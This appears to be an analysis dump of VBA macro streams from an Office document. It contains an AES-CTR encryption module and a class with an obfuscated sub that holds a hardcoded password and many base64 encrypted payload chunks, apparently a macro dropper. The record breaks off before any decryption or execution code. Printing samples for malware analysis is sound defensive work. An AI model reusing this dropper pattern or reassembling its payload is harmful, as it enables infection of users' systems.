        VBA File Name: Module3.bas, Stream Size: 48244
        General
        Stream Path:Macros/VBA/Module3
        VBA File Name:Module3.bas
        Stream Size:48244
        Data ASCII:. . . . . 4 . . . C . . . . . . . . . . C . . . . . . . . . . . . D . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B C r
        Data Raw:01 16 03 00 00 34 05 00 00 be 43 00 00 18 05 00 00 1c 06 00 00 ff ff ff ff c6 43 00 00 fe 94 00 00 08 00 00 00 01 00 00 00 d4 44 f8 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 9e 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 a4 02 50 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "Module3"
'--- mdAesCtr.bas
Option Explicit
DefObj A-Z

#Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)

'=========================================================================
' API
'=========================================================================

#If Win64 Then
    Private Const PTR_SIZE                  As Long = 8
#Else
    Private Const PTR_SIZE                  As Long = 4
#End If

#If HasPtrSafe Then
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#Else
Private Enum LongPtr
    [_]
End Enum
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#End If
#If Not ImplUseShared Then
    #If HasPtrSafe Then
    Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #Else
    Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #End If
#End If

'=========================================================================
' Constants and member variables
'=========================================================================

Private Const AES_BLOCK_SIZE        As Long = 16
Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
Private Const KDF_SALTLEN           As Long = 8
Private Const KDF_ITER              As Long = 10000
Private Const KDF_HASH              As String = "SHA512"
Private Const HMAC_HASH             As String = "SHA256"
Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
Private Const OPENSSL_MAGICLEN      As Long = 8
Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"

Private Type UcsCryptoContextType
    hPbkdf2Alg          As LongPtr
    hHmacAlg            As LongPtr
    hHmacHash           As LongPtr
    HashLen             As Long
    hAesAlg             As LongPtr
    hAesKey             As LongPtr
    AesKeyObjData()     As Byte
    AesKeyObjLen        As Long
    Nonce(0 To 3)       As Long
    EncrData()          As Byte
    EncrPos             As Long
    LastError           As String
End Type

Private m_uChunkedCtx           As UcsCryptoContextType

'=========================================================================
' Functions
'=========================================================================

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sError          As String
    
    baData = ToUtf8Array(sText)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
        Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    If Not IsArray(Password) Then
        ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
        If UBound(baData) >= PREFIXLEN Then
            Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
        End If
        Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
        Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
    End If
    AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
End Function

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sMagic          As String
    Dim sError          As String
    
    baData = FromBase64Array(sEncr)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        If UBound(baData) >= PREFIXLEN - 1 Then
            sMagic = String$(OPENSSL_MAGICLEN, 0)
            Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
            If sMagic = OPENSSL_MAGIC Then
                ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                If UBound(baData) >= PREFIXLEN Then
                    Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                    ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                Else
                    baData = vbNullString
                End If
            End If
        End If
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    AesDecryptString = FromUtf8Array(baData)
End Function

Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
    Const VT_BYREF      As Long = &H4000
    Dim uCtx            As UcsCryptoContextType
    Dim vErr            As Variant
    Dim bHashBefore     As Boolean
    Dim bHashAfter      As Boolean
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim baTemp()        As Byte
    Dim lPtr            As LongPtr
    
    On Error GoTo EH
    If IsArray(Hmac) Then
        bHashBefore = (Hmac(0) <= 0)
        bHashAfter = (Hmac(0) > 0)
    End If
    If IsMissing(Password) Then
        baPass = vbNullString
    ElseIf IsArray(Password) Then
        baPass = Password
    Else
        baPass = ToUtf8Array(Password & vbNullString)
    End If
    If IsMissing(Salt) Then
        baSalt = baPass
    ElseIf IsArray(Salt) Then
        baSalt = Salt
    Else
        baSalt = ToUtf8Array(Salt & vbNullString)
    End If
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If IsArray(Hmac) Then
        baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
        #If Win64 Then
            lPtr = PeekPtr(VarPtr(Hmac) + 8)
        #Else
            lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
        #End If
        If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
            lPtr = PeekPtr(lPtr)
        End If
        #If Win64 Then
            lPtr = PeekPtr(lPtr + 16)
        #Else
            lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
        #End If
        Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
    End If
    '--- success
    AesCryptArray = True
QH:
    pvCryptoAesCtrTerminate uCtx
    Exit Function
EH:
    vErr = Array(Err.Number, Err.Source, Err.Description)
    pvCryptoAesCtrTerminate uCtx
    Err.Raise vErr(0), vErr(1), vErr(2)
End Function

Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
    Dim baEmpty()       As Byte
    Dim baKey()         As Byte
    
    pvCryptoAesCtrTerminate m_uChunkedCtx
    baEmpty = vbNullString
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
End Function

Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
    If m_uChunkedCtx.hAesAlg = 0 Then
        m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
        Exit Function
    End If
    baOutput = baInput
    AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
    If Final Then
        pvCryptoAesCtrTerminate m_uChunkedCtx
    End If
End Function

Public Function AesChunkedGetLastError() As String
    AesChunkedGetLastError = m_uChunkedCtx.LastError
End Function

'= private ===============================================================

Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
    Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
    Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
    Dim hResult         As Long
    
    With uCtx
        '--- init member vars
        .EncrData = vbNullString
        .EncrPos = 0
        .LastError = vbNullString
        ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
        If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
            '--- generate RFC 2898 based derived key
            On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
            hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
            If hResult < 0 Then
                GoTo QH
            End If
            hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
            If hResult < 0 Then
                GoTo QH
            End If
            On Error GoTo 0
        End If
        '--- init AES key from first half of derived key
        On Error GoTo EH_Unsupported '--- CNG API missing on XP
        hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
        If hResult < 0 Then
            GoTo QH
        End If
        On Error GoTo 0
        hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
        If hResult < 0 Then
            GoTo QH
        End If
        ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
        hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        '--- init AES IV from second half of derived key
        Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
        '--- init HMAC key from last HashLen bytes of derived key
        hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
    End With
    '--- success
    pvCryptoAesCtrInit = True
    Exit Function
QH:
    uCtx.LastError = GetSystemMessage(hResult)
    Exit Function
EH_Unsupported:
    uCtx.LastError = ERR_UNSUPPORTED_ENCR
End Function

Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
    With uCtx
        If .hPbkdf2Alg <> 0 Then
            Call BCryptCloseAlgorithmProvider(.

        VBA File Name: ViewSession.cls, Stream Size: 11833
        General
        Stream Path:Macros/VBA/ViewSession
        VBA File Name:ViewSession.cls
        Stream Size:11833
        Data ASCII:. . . . . . . . . . . . . . . . 8 . . . ! . . . M . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . N . / = 6 C 7 ~ I D . * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . . . b . M . . i S . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S . . . . . S . . . . . S . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . .
        Data Raw:01 16 03 00 00 00 01 00 00 1a 05 00 00 e4 00 00 00 38 02 00 00 ff ff ff ff 21 05 00 00 4d 1a 00 00 00 00 00 00 01 00 00 00 d4 44 d1 cf 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 4e 1e 2f 3d c2 f3 36 43 b9 37 7e aa 49 44 a4 0d 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "ViewSession"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub ikwiwiejs_19293_Ade()
    Dim key As String
    Dim decryptedText As String
    Dim i As Integer
    Dim parts(1 To 60) As String
    Dim Oekksoioa_ As String
    Dim chunkSize As Integer
    Dim tempFilePath As String

    ' ?t kha AES
    key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
    part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
    part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
    part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
    part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
    part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
    part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
    part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
    part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
    part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
    part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
    part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
    part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
    part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
    part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
    part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
    part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
    part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
    part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
    part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
    part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
    part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
    part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
